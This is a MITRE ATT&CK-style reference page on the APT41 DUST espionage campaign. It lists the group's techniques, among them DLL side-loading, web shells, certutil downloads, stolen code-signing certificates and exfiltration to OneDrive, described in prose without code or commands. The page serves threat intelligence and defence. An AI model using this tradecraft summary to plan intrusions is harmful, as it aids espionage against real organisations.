APT41 DUST

APT41 DUST was conducted by APT41 from 2023 to July 2024 against entities in Europe, Asia, and the Middle East. APT41 DUST targeted sectors such as shipping, logistics, and media for information gathering purposes. APT41 used previously-observed malware such as DUSTPAN as well as newly observed tools such as DUSTTRAP in APT41 DUST.[1]

ID: C0040
First Seen:  January 2023 [1]
Last Seen:  June 2024 [1]
Version: 1.0
Created: 16 September 2024
Last Modified: 21 September 2024

Groups

ID Name Description
G0096 APT41

APT41 DUST was conducted by APT41 from 2023 to July 2024.[1]

Techniques Used

Domain ID Name Use
Enterprise T1583 .007 Acquire Infrastructure: Serverless

APT41 DUST used infrastructure hosted behind Cloudflare or utilized Cloudflare Workers for command and control.[1]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT41 DUST used HTTPS for command and control.[1]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

APT41 DUST used rar to compress data downloaded from internal Oracle databases prior to exfiltration.[1]

Enterprise T1119 Automated Collection

APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information.[1]

Enterprise T1586 .003 Compromise Accounts: Cloud Accounts

APT41 DUST used compromised Google Workspace accounts for command and control.[1]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT41 DUST used Windows Services with names such as Windows Defend for persistence of DUSTPAN.[1]

Enterprise T1213 Data from Information Repositories

APT41 DUST collected data from victim Oracle databases using SQLULDR2.[1]

Enterprise T1074 .001 Data Staged: Local Data Staging

APT41 DUST involved exporting data from Oracle databases to local CSV files prior to exfiltration.[1]

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

APT41 DUST used HTTPS for command and control.[1]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

APT41 DUST exfiltrated collected information to OneDrive.[1]

Enterprise T1574 .001 Hijack Execution Flow: DLL Search Order Hijacking

APT41 DUST involved the use of DLL search order hijacking to execute DUSTTRAP.[1]

.002 Hijack Execution Flow: DLL Side-Loading

APT41 DUST used DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller.[1]

Enterprise T1070 .004 Indicator Removal: File Deletion

APT41 DUST deleted various artifacts from victim systems following use.[1]

Enterprise T1105 Ingress Tool Transfer

APT41 DUST involved execution of certutil.exe via web shell to download the DUSTPAN dropper.[1]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as w3wp.exe or conn.exe.[1]

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

APT41 DUST used encrypted payloads decrypted and executed in memory.[1]

Enterprise T1588 .003 Obtain Capabilities: Code Signing Certificates

APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and components.[1]

Enterprise T1596 .005 Search Open Technical Databases: Scan Databases

APT41 DUST used internet scan data for target development.[1]

Enterprise T1593 .002 Search Open Websites/Domains: Search Engines

APT41 DUST involved use of search engines to research victim servers.[1]

Enterprise T1594 Search Victim-Owned Websites

APT41 DUST involved access of external victim websites for target development.[1]

Enterprise T1505 .003 Server Software Component: Web Shell

APT41 DUST involved use of web shells such as ANTSWORD and BLUEBEAM for persistence.[1]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

APT41 DUST used stolen code signing certificates for DUSTTRAP malware and subsequent payloads.[1]

Enterprise T1569 .002 System Services: Service Execution

APT41 DUST used Windows services to execute DUSTPAN.[1]

Enterprise T1102 Web Service

APT41 DUST used compromised Google Workspace accounts for command and control.[1]

Software

References